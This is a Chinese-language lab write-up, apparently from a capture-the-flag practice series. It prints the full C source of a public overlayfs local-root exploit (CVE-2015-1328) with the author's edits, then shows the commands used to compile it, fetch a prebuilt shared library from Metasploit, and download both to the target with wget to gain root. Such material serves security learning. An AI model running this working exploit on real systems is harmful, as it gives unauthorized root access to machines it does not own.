PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite | linux/local/3572.php
Pi-hole < 4.4 - Authenticated Remote Code Execution | linux/webapps/48442.py
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation | linux/webapps/48443.py
Redis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py
RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution | linux/webapps/45361.py
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) | linux/local/46359.md
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) | linux/local/46369.md
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit) | linux/remote/42084.rb
SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion | linux/webapps/44655.txt
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit) | linux/webapps/41697.rb
Splunk < 7.0.1 - Information Disclosure | linux/webapps/44865.txt
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation | linux/local/43935.txt
Tenable Appliance < 4.5 - Root Remote Code Execution | linux/remote/41892.sh
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution | linux/remote/42949.txt
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation | linux/local/42936.md
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape | linux/local/42937.md
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution | linux/local/46973.md
Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities | linux/remote/9143.txt
WordPress Core < 4.7.4 - Unauthorized Password Reset | linux/webapps/41963.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
利用Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
┌──(kali㉿kali)-[~/HTB/week1]
└─$ cp /usr/share/exploitdb/exploits/linux/local/37292.c .
查看一下它的内容:
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
static char child_stack[1024*1024];
static int
child_exec(void *stuff)
{
char *file;
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);
fprintf(stderr,"mount #1\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";
chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");
chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}
int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;
fprintf(stderr,"spawning threads\n");
if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");
if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid < 0) {
fprintf(stderr, "failed to create new mount namespace\n");
exit(-1);
}
waitpid(pid, &status, 0);
}
waitpid(init, &status, 0);
return 0;
}
usleep(300000);
wait(NULL);
fprintf(stderr,"child threads done\n");
fd = open("/etc/ld.so.preload",O_WRONLY);
if(fd == -1) {
fprintf(stderr,"exploit failed\n");
exit(-1);
}
fprintf(stderr,"/etc/ld.so.preload created\n");
fprintf(stderr,"creating shared library\n");
//下面这段是我添加的注释
/*
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
write(lib,LIB,strlen(LIB));
close(lib);
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
if(lib != 0) {
fprintf(stderr,"couldn't create dynamic library\n");
exit(-1);
}
write(fd,"/tmp/ofs-lib.so\n",16);
*/
close(fd);
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
execl("/bin/su","su",NULL);
}
因为目标环境没有gcc编译器,所以凡是内容涉及到编译的都要想办法解决,这里就是直接拷贝他需要的so文件到它的/tmp目录下面,并且在本地编译好exp后上传
先定位需要的so文件
┌──(kali㉿kali)-[~/HTB/week1]
└─$ locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
编译exp:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ gcc -o exp 37292.c
37292.c: In function ‘main’:
37292.c:106:12: warning: implicit declaration of function ‘unshare’ [-Wimplicit-function-declaration]
106 | if(unshare(CLONE_NEWUSER) != 0)
| ^~~~~~~
37292.c:111:17: warning: implicit declaration of function ‘clone’; did you mean ‘close’? [-Wimplicit-function-declaration]
111 | clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
| ^~~~~
| close
37292.c:117:13: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration]
117 | waitpid(pid, &status, 0);
| ^~~~~~~
37292.c:127:5: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]
127 | wait(NULL);
| ^~~~
┌──(kali㉿kali)-[~/HTB/week1]
└─$ ls
36337.py 37292.c exp
编译的时候报错了,但是成功生成exp了,再把需要的so文件拷贝下来:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
┌──(kali㉿kali)-[~/HTB/week1]
└─$ ls
36337.py 37292.c exp ofs-lib.so
然后开启一个http服务:
┌──(kali㉿kali)-[~/HTB/week1]
└─$ python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
因为这个exp是利用/tmp的目录下的文件,我们在/tmp下进行下载文件:
/tmp # wget 192.168.64.128:8888/exp
wget 192.168.64.128:8888/exp
Connecting to 192.168.64.128:8888 (192.168.64.128:8888)
exp 100% |*******************************| 17576 0:00:00 ETA
另外这里我用的kali的gcc编译的似乎提权不了,但是用ubuntu的就可以,不知道是操作系统的原因还是因为gcc版本的原因:
yu@yu-virtual-machine:/var/www/html$ gcc --version
gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
┌──(kali㉿kali)-[~/HTB/week1]
└─$ gcc --version
gcc (Debian 12.2.0-14) 12.2.0
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
最后成功提权
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nkqWSoD8-1685660171849)(https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601204229-ontbx8a.png)]